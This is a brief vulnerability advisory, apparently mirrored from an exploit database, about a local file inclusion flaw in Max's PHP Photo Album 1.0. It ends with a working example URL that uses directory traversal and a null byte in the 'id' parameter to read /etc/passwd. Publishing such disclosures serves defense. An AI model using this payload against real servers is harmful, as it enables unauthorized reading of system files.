Max’s PHP Photo Album 1.0 – ‘id’ Local File Inclusion

  • 作者: n0tch
    日期: 2012-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36968/
  • source: https://www.securityfocus.com/bid/52474/info
    
    Max's PHP Photo Album is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
    
    An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. 
    
    http//www.example.com/maximage/showImage.php?id=../../../../../../../../../../../../etc/passwd%00